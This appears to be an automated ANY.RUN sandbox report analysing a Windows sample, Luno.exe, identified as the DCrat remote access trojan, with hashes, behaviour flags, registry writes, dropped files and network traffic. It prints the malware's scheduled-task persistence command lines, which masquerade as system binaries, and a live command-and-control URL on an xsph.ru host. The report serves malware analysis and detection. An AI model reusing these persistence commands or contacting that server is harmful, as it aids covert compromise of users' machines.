File name:

Luno.exe

Full analysis: https://app.any.run/tasks/abeecd66-6378-4005-b1f1-622afa22bb50
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: March 11, 2025, 16:19:47
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
dcrat
rat
remote
darkcrystal
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

305DB5A255E9847FFD31AEDAE51F035C

SHA1:

EBB636355B511E4C3456FF0D4E82A767701C2877

SHA256:

F55813C3AF40669E49A77CEA37D1D303F578EF26A101417CDACF8AC4FC65DA5E

SSDEEP:

49152:HFrKj5G0lvhhneLyiN/aw3R8iUan8/EWLeZXNCJV1x+e7mEgsjN:HFrKdVvpiUan8sv9G9H7DN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 7892)

    • DCRAT mutex has been found

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)

    • DARKCRYSTAL has been detected (SURICATA)

      • services.exe (PID: 2772)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 7892)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7892)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7892)

    • Executable content was dropped or overwritten

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)

    • Executed via WMI

      • schtasks.exe (PID: 4688)
      • schtasks.exe (PID: 5868)
      • schtasks.exe (PID: 7380)
      • schtasks.exe (PID: 8164)
      • schtasks.exe (PID: 4208)
      • schtasks.exe (PID: 7364)
      • schtasks.exe (PID: 1072)
      • schtasks.exe (PID: 5064)
      • schtasks.exe (PID: 7460)
      • schtasks.exe (PID: 5972)
      • schtasks.exe (PID: 7420)
      • schtasks.exe (PID: 7448)
      • schtasks.exe (PID: 728)
      • schtasks.exe (PID: 7708)
      • schtasks.exe (PID: 7516)
      • schtasks.exe (PID: 7728)
      • schtasks.exe (PID: 7488)
      • schtasks.exe (PID: 7332)
      • schtasks.exe (PID: 6032)
      • schtasks.exe (PID: 1132)
      • schtasks.exe (PID: 7012)
      • schtasks.exe (PID: 5892)
      • schtasks.exe (PID: 1180)
      • schtasks.exe (PID: 5404)
      • schtasks.exe (PID: 7184)
      • schtasks.exe (PID: 5504)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7084)
      • schtasks.exe (PID: 7228)
      • schtasks.exe (PID: 6744)
      • schtasks.exe (PID: 5720)
      • schtasks.exe (PID: 920)
      • schtasks.exe (PID: 5280)
      • schtasks.exe (PID: 7280)
      • schtasks.exe (PID: 7300)
      • schtasks.exe (PID: 7216)
      • schtasks.exe (PID: 1760)
      • schtasks.exe (PID: 4652)
      • schtasks.exe (PID: 976)
      • schtasks.exe (PID: 7720)
      • schtasks.exe (PID: 7560)
      • schtasks.exe (PID: 7672)
      • schtasks.exe (PID: 7676)
      • schtasks.exe (PID: 7556)
      • schtasks.exe (PID: 5936)
      • schtasks.exe (PID: 7844)
      • schtasks.exe (PID: 7696)
      • schtasks.exe (PID: 7880)
      • schtasks.exe (PID: 4428)
      • schtasks.exe (PID: 6436)

    • The process creates files with name similar to system file names

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)

    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 7728)
      • schtasks.exe (PID: 7516)
      • schtasks.exe (PID: 7488)
      • schtasks.exe (PID: 3768)
      • schtasks.exe (PID: 6112)
      • schtasks.exe (PID: 7216)
      • schtasks.exe (PID: 5504)
      • schtasks.exe (PID: 976)
      • schtasks.exe (PID: 7720)
      • schtasks.exe (PID: 7084)
      • schtasks.exe (PID: 4428)
      • schtasks.exe (PID: 7184)

    • Reads the date of Windows installation

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)

    • Application launched itself

      • Porthost.exe (PID: 8032)

    • Starts itself from another location

      • Porthost.exe (PID: 4008)

  • INFO

    • Reads the computer name

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • Luno.exe (PID: 7848)

    • Process checks computer location settings

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)

    • Checks supported languages

      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)

    • Reads Environment values

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)

    • The sample compiled with english language support

      • Porthost.exe (PID: 8032)
      • Luno.exe (PID: 7848)
      • Porthost.exe (PID: 4008)

    • Reads the machine GUID from the registry

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)
      • services.exe (PID: 2772)

    • Failed to create an executable file in Windows directory

      • Porthost.exe (PID: 8032)
      • Porthost.exe (PID: 4008)

    • Creates files in the program directory

      • Porthost.exe (PID: 4008)

    • Reads the software policy settings

      • slui.exe (PID: 7904)

    • Disables trace logs

      • services.exe (PID: 2772)

    • Checks proxy server information

      • services.exe (PID: 2772)
      • slui.exe (PID: 7904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 255488
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
178
Monitored processes
60
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start luno.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs #DCRAT porthost.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT porthost.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DARKCRYSTAL services.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
728schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Desktop\Idle.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\bridgecontainerCrtnet\csrss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
976schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Documents\My Videos\SearchApp.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1072schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Users\admin\Favorites\Links\fontdrvhost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1132schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\bridgecontainerCrtnet\spoolsv.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1180schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\bridgecontainerCrtnet\csrss.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1760schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 11 /tr "'C:\bridgecontainerCrtnet\dasHost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2772"C:\bridgecontainerCrtnet\services.exe" C:\bridgecontainerCrtnet\services.exe
Porthost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\bridgecontainercrtnet\services.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3768schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\dasHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 017
Read events
7 999
Write events
18
Delete events
0

Modification events

(PID) Process:(7848) Luno.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(8032) Porthost.exeKey:HKEY_CURRENT_USER\SOFTWARE\26afce736a6de91186362b839ee521211f876bbb
Operation:writeName:2cbc6209724f0e5408f5674defca0a42dd9863d4
Value:
WyJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxQb3J0aG9zdC5leGUiLCJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxSdW50aW1lQnJva2VyLmV4ZSIsIkM6XFxVc2Vyc1xcYWRtaW5cXHNsdWkuZXhlIiwiQzpcXFVzZXJzXFxhZG1pblxcRmF2b3JpdGVzXFxMaW5rc1xcZm9udGRydmhvc3QuZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcc2lob3N0LmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcRGVza3RvcFxcSWRsZS5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcVmlkZW9zXFxTeXN0ZW0uZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcc3Bvb2xzdi5leGUiXQ==
(PID) Process:(4008) Porthost.exeKey:HKEY_CURRENT_USER\SOFTWARE\26afce736a6de91186362b839ee521211f876bbb
Operation:writeName:2cbc6209724f0e5408f5674defca0a42dd9863d4
Value:
WyJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxQb3J0aG9zdC5leGUiLCJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxjc3Jzcy5leGUiLCJDOlxcYnJpZGdlY29udGFpbmVyQ3J0bmV0XFxTeXN0ZW0uZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXFBpY3R1cmVzXFxkYXNIb3N0LmV4ZSIsIkM6XFxVc2Vyc1xcUHVibGljXFxNdXNpY1xcY3RmbW9uLmV4ZSIsIkM6XFxicmlkZ2Vjb250YWluZXJDcnRuZXRcXGRhc0hvc3QuZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcc2VydmljZXMuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXERvY3VtZW50c1xcTXkgVmlkZW9zXFxTZWFyY2hBcHAuZXhlIiwiQzpcXGJyaWRnZWNvbnRhaW5lckNydG5ldFxcV21pUHJ2U0UuZXhlIiwiQzpcXFVzZXJzXFxBbGwgVXNlcnNcXGNzcnNzLmV4ZSIsIkM6XFxXaW5kb3dzXFxSZWdpc3RyYXRpb25cXENSTUxvZ1xcU3RhcnRNZW51RXhwZXJpZW5jZUhvc3QuZXhlIl0=
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2772) services.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\services_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
18
Suspicious files
1
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
7848Luno.exeC:\bridgecontainerCrtnet\Porthost.exeexecutable
MD5:81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256:538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E
8032Porthost.exeC:\Users\admin\a29f4157103644text
MD5:C0E6B6D49FD1AFF7422AC1E8BBEC8D17
SHA256:67BBBCF4EBD9E379C1F52E4CD93239AAD4C29CB32FA14BEBD098C3EC8924A144
8032Porthost.exeC:\Users\admin\Favorites\Links\fontdrvhost.exeexecutable
MD5:81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256:538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E
8032Porthost.exeC:\Users\admin\slui.exeexecutable
MD5:81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256:538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E
7848Luno.exeC:\bridgecontainerCrtnet\15DZJy1sJWzJp6BTZUbI23XZpA0v.vbebinary
MD5:321AF5B2765FF534A7F88382F26D94E0
SHA256:132E69761A2757F68056DD494AC49A071FFFA218BA6F18D3FCCFD93B29816FAF
8032Porthost.exeC:\bridgecontainerCrtnet\9e8d7a4ca61bd9text
MD5:D2B0690872F7F6182740A7DD4793667D
SHA256:C8CD3CEE07214A5DDDE817658CECD7CF84C8C50A4F170B2A371EC6B311AFC51E
8032Porthost.exeC:\Users\Default\Desktop\Idle.exeexecutable
MD5:81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256:538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E
8032Porthost.exeC:\bridgecontainerCrtnet\spoolsv.exeexecutable
MD5:81F6BD03EB55DB5C9F3B8E32F52AC261
SHA256:538600C37369CE1ABC62491E757C070765FAAFA26A013DCE5061D89E5655350E
8032Porthost.exeC:\Users\Default\Desktop\6ccacd8608530ftext
MD5:F0BE5DF0A362B1CD9A96BA65F5E0D859
SHA256:8C0387AA97BE132E588318E120873B662BDBB8ACC9C9410B496675CF59510450
8032Porthost.exeC:\bridgecontainerCrtnet\f3b6ecef712a24text
MD5:E10F32E5D55EB4DE9600F2A993B4A604
SHA256:9AD0DA8A35A722DC3784AD46E9025ABB5EB06D99D6DD6C9BBBAC5A48586A644C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
19
DNS requests
6
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
services.exe
GET
400
141.8.197.42:80
http://a1097913.xsph.ru/a1c6de26.php?3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm&f1742bb50f5b79f28188f3faa38122c0=77fff1d46fd67ec38f7a4edef8f7d53b&375de9cdf10c3d58680d477424411d8f=wY2gTO1IzMwQDM3QzY2Y2NhJmZygTNxIWY1ETZiNjMmdjNxUDN4YmN&3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm
unknown
whitelisted
2772
services.exe
GET
400
141.8.197.42:80
http://a1097913.xsph.ru/a1c6de26.php?3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm&f1742bb50f5b79f28188f3faa38122c0=77fff1d46fd67ec38f7a4edef8f7d53b&375de9cdf10c3d58680d477424411d8f=wY2gTO1IzMwQDM3QzY2Y2NhJmZygTNxIWY1ETZiNjMmdjNxUDN4YmN&3xELc3DtIyQuahx8Soxr1=Djl7QPa&2aqkfsWRTj3Wrh5sE=vZTK2QwsufkfmxSn6zEzCEmAUNy&dfn22ZeBLrhZyw81=y7FEElFoOxqxTzpcRPO1rm
unknown
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
500
40.91.76.224:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2772
services.exe
141.8.197.42:80
a1097913.xsph.ru
Sprinthost.ru LLC
RU
whitelisted
7612
slui.exe
20.83.72.98:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7904
slui.exe
20.83.72.98:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
a1097913.xsph.ru
  • 141.8.197.42
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (xsph .ru)
2196
svchost.exe
Misc activity
ET INFO Observed DNS Query to xsph .ru Domain
2772
services.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Luno.exe